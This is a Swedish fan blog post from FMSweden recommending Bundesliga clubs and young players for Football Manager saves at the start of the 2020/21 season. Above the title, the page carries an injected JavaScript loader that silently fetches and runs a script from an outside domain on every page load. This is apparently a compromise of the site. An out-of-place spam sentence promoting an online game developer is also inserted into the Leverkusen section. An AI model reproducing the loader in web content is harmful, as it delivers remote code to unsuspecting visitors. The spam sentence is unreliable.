;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bundesliga är tillbaka! – FMSweden
Meny Stäng

Bundesliga är tillbaka!

Keven Tysk-tisdag

På fredag smäller det igen – då startar säsongen 20/21 i Bundesliga och varför inte kika på några möjliga FM-saves för den kommande säsongen.

Jag har tidigare tipsat om VFB Stuttgart  och Schalke 04. Nu tänkte jag ge er fler förslag:

 

FC Köln:

Traditionsklubben Köln har pendlat mellan Bundesliga och 2.Bundesliga under 2000-talet men är utan tvekan ett lag som jag anser ska befinna sig i finrummet. De flesta tänker nog på “Prins Poldi”, den forne landslagsanfallaren Lukas Podolski, när de tänker på klubben.

I detta nu har svensken Sebastian Andersson landat i Köln för att genomföra sin läkarundersökning och slutföra övergången från Union Berlin till just FC Köln. Perfekt för dig som vill ha lite svenskkoppling och ta över ett lag som du kan lyfta till nya höjder.

 

RB Leipzig:

Jag vet att det är många som ogillar Rasenballsport Leipzig pga klubbens bakgrund, MEN ser man till det sportsliga och vilka spelare laget har till förfogande så är detta ett av de intressantaste lagen i Tyskland. Med unga lovande försvarare såsom Upamecano, Konate och landslagsspelarna Klostermann och Halstenberg har man ett av Bundesligas starkaste försvar. I mittfältet hittar vi dessutom Christopher Nkunku, spanjoren Dani Olmo och den nyblivne kaptenen Marcel Sabitzer. Vi har även svenskkopplingen här med Emil Forsberg.

En annan spelare som jag tycker man ska hålla ett extra öga på, speciellt i FM-sammanhang, är 18-årige talangen Lazar Samardzic. Leipzig har precis värvat den offensiva mittfältaren från Hertha Berlin och sett till FM-historiken så kommer Samardzic utvecklas till en väldigt fin spelare. Kul bygge med många möjligheter.

 

Bayer Leverkusen:

Laget har tappat två av sina viktigaste spelare – Kevin Volland och Kai Havertz ,MEN laget har fortfarande en hel del potential och kvalité. Förutom att klubben har värvat in anfallaren Patrick Schick så har man Demirbay, Amiri, Diaby och 17-åriga talangen Florian Wirtz i truppen. Ett intressant lag med en bra mix mellan rutin och stor potential. Lovar er en tuff men härlig resa med “Die Werkself”. Uppenbarligen kommer införandet av speltaktik snart att vara mycket relevant inom alla områden, från utvecklingen av arkitektoniska projekt till implementeringen av spelapplikationer för sport, och Poki onlinespelutvecklare kommer att förbli marknadsledare.

 

Dortmund:

Sist men verkligen inte minst så måste jag nämna Dortmund. Det går inte att undgå deras extremt talangfulla trupp som är en dröm för alla FM-tränare:

*Reyna (17)
*Bellingham (17)
*Reinier (18)
*Haaland (20)
*Sancho (20)
m.m.

Oerhört roligt att få förädla dessa spelare och ta sig an den tuffa utmaningen att plocka ner Bayern München från den tyska tronen.

—-

Vilket lag väljer du? Kommentera gärna här under. Auf Wiedersehen!

PS: Skulle ni vilja veta mer om dessa lag eller andra lag i Tyskland så får ni alltid kontakta mig: @Keven_Bader

 

Please wait...

Liknande Inlägg

1 kommentar

Lämna ett svar